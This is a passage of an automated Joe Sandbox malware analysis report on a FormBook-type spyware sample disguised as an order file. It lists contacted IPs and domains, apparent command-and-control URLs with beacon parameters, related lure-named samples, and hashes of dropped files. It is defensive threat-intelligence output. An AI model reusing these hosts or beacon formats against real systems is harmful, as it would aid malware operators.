                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.sedo.com/services/parking.php3OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2Fcompact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hondamechanic.todayOFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKfirefox.exe, 0000000F.00000002.2818794642.0000000026FA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://img.sedoparking.com/templates/images/hero_nc.svgcompact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/js/min.js?v2.3compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    172.217.18.19
                                                    		ghs.google.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    144.208.124.10
                                                    		superunicornpalace.comUnited States
                                                    		395092SHOCK-1USfalse
                                                    64.190.62.22
                                                    		www.hondamechanic.todayUnited States
                                                    		11696NBS11696USfalse
                                                    203.161.49.220
                                                    		www.hellokong.xyzMalaysia
                                                    		45899VNPT-AS-VNVNPTCorpVNtrue
                                                    208.91.197.13
                                                    		www.mengistiebethlehem.comVirgin Islands (BRITISH)
                                                    		40034CONFLUENCE-NETWORK-INCVGfalse
                                                    91.195.240.19
                                                    		parkingpage.namecheap.comGermany
                                                    		47846SEDO-ASDEfalse
                                                    162.43.101.114
                                                    		www.tedjp-x.comUnited States
                                                    		11333CYBERTRAILSUSfalse
                                                    217.160.0.84
                                                    		www.architect-usschool.comGermany
                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                    89.31.76.10
                                                    		sitestudio.itItaly
                                                    		24994GENESYS-ASITfalse
                                                    188.114.96.3
                                                    		www.ad14.funEuropean Union
                                                    		13335CLOUDFLARENETUSfalse
                                                    45.113.122.18
                                                    		3cubesinterior.inIndia
                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                    192.185.208.8
                                                    		epicbazaarhub.comUnited States
                                                    		46606UNIFIEDLAYER-AS-1USfalse
                                                    121.254.178.230
                                                    		www.rz6grmvv.shopKorea Republic of
                                                    		3786LGDACOMLGDACOMCorporationKRfalse

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1467079
                                                    Start date and time:2024-07-03 17:49:18 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 11m 31s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:14
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:spec 4008670601 AZTEK Order.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@12/7@14/13
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 89%
                                                    • Number of executed functions: 172
                                                    • Number of non-executed functions: 285
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: spec 4008670601 AZTEK Order.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:50:07API Interceptor1x Sleep call for process: spec 4008670601 AZTEK Order.exe modified
                                                    11:50:09API Interceptor14x Sleep call for process: powershell.exe modified
                                                    11:51:25API Interceptor9957357x Sleep call for process: compact.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    64.190.62.221R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                    • www.turf-installer.top/huho/
                                                    Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.hofiw.link/7ixz/
                                                    ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                    • www.hondamechanic.today/expp/
                                                    Transfer Swift USD 87000.exeGet hashmaliciousFormBookBrowse
                                                    • www.chefjob6.live/vpkv/
                                                    unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.woodsplitter1.xyz/9h33/
                                                    BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                    • www.hondamechanic.today/expp/
                                                    BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                    • www.hondamechanic.today/expp/
                                                    Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.woodsplitter1.xyz/9h33/
                                                    z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                                    • www.hondamechanic.today/expp/
                                                    ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                    • www.hondamechanic.today/expp/
                                                    203.161.49.220RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                                    • www.hellokong.xyz/ov93/
                                                    SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                    • www.techsterverse.xyz/5ane/?3jJlx=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HxzfaZ9sFDrl94fCLYBT2VvoaMEhAOTvuaALRdPfNkFFP06X4hxPxwuOU&Vn=Ydx4qJJ0n
                                                    Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                    • www.evertudy.xyz/csr7/
                                                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.evertudy.xyz/csr7/
                                                    Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                                    • www.techsterverse.xyz/5ane/?iHmHOtK=WTbBFWOTcFPDCMhESefslTJ6+GkUog7y940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HwzLeEe0DEJwM8vfrVi/4VNBsPllMeibbLgY=&L480=nFsp
                                                    indent PWS-020199.exeGet hashmaliciousFormBookBrowse
                                                    • www.hellokong.xyz/ov93/
                                                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                    • www.evertudy.xyz/csr7/
                                                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                    • www.evertudy.xyz/csr7/
                                                    KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                    • www.evertudy.xyz/csr7/
                                                    288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                                    • www.techsterverse.xyz/5ane/?Hp=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HxzfaZ9sFDrl94fCLYBT2VvoaMEhAOTvuaALRdPfNkFFP06X4hxPxwuOU&5H=CtUlKhgP42a

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    parkingpage.namecheap.com03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Att00173994.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Attendance list.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Att0027592.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    #U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    sitestudio.itGQVUENt6FZ.exeGet hashmaliciousFormBookBrowse
                                                    • 89.31.76.10
                                                    www.hondamechanic.todayORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    BANK DETAILS CORRECTIONS.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 64.190.62.22
                                                    www.architect-usschool.comCATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.84
                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.84
                                                    reimainternatio.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.84
                                                    www.ad14.funSOA 020724.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    RITS Ref 3379-06.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    PMP-INS-93-2436-IN-1017.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    KOSTCO OFFER REF 440724.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    E-2023-06-41-041-0084.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    www.tedjp-x.comSOA 020724.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    RITS Ref 3379-06.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    PMP-INS-93-2436-IN-1017.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    KOSTCO OFFER REF 440724.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114
                                                    E-2023-06-41-041-0084.scr.exeGet hashmaliciousFormBookBrowse
                                                    • 162.43.101.114

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    NBS11696USBn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                    • 64.190.63.222
                                                    gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                    • 64.190.63.222
                                                    Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                                    • 64.190.63.222
                                                    gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                                    • 64.190.63.222
                                                    1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    Reporte Comercial.pdfGet hashmaliciousUnknownBrowse
                                                    • 64.190.63.136
                                                    Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    D8zldeBMpl.exeGet hashmaliciousNjratBrowse
                                                    • 64.190.63.222
                                                    ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                    • 64.190.62.22
                                                    Rn1AkuRExh.elfGet hashmaliciousMiraiBrowse
                                                    • 64.33.213.197
                                                    SHOCK-1USSHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 208.123.119.169
                                                    New PO for Project - 00775 00875 02195.exeGet hashmaliciousRemcosBrowse
                                                    • 144.208.127.241
                                                    app.pln.bin.dllGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.110
                                                    app.pln.bin.dllGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.110
                                                    app.exeGet hashmaliciousUnknownBrowse
                                                    • 144.208.127.230
                                                    nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.225
                                                    nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.225
                                                    Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.225
                                                    out.exeGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.225
                                                    out.exeGet hashmaliciousUnknownBrowse
                                                    • 209.182.225.225
                                                    VNPT-AS-VNVNPTCorpVNAWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.50.127
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.43.228
                                                    fisher man.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.55.124
                                                    GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.55.102
                                                    MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.43.228
                                                    7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.41.205
                                                    RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.49.220
                                                    SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.49.220
                                                    RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                    • 203.161.46.44
                                                    Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.49.220
                                                    CONFLUENCE-NETWORK-INCVGFiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                    • 208.91.196.253
                                                    Attendance list.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                    • 208.91.197.27
                                                    e98.dllGet hashmaliciousUnknownBrowse
                                                    • 204.11.56.48
                                                    e98.dllGet hashmaliciousUnknownBrowse
                                                    • 204.11.56.48

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spec 4008670601 AZTEK Order.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1172
                                                    Entropy (8bit):5.356731422178564
                                                    Encrypted:false
                                                    SSDEEP:24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
                                                    MD5:68CB8F49FDE7FC3DF6CEE19CB730C7F8
                                                    SHA1:1EC425657E358C85CA4A3A04E6525E29B59FCB16
                                                    SHA-256:5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
                                                    SHA-512:D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                    C:\Users\user\AppData\Local\Temp\N77o9w1836

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\compact.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1239949490932863
                                                    Encrypted:false
                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                    MD5:271D5F995996735B01672CF227C81C17
                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yx0pa5d.iec.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hefjqtk1.rer.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvfivwcf.jud.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdfgkkzi.gve.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
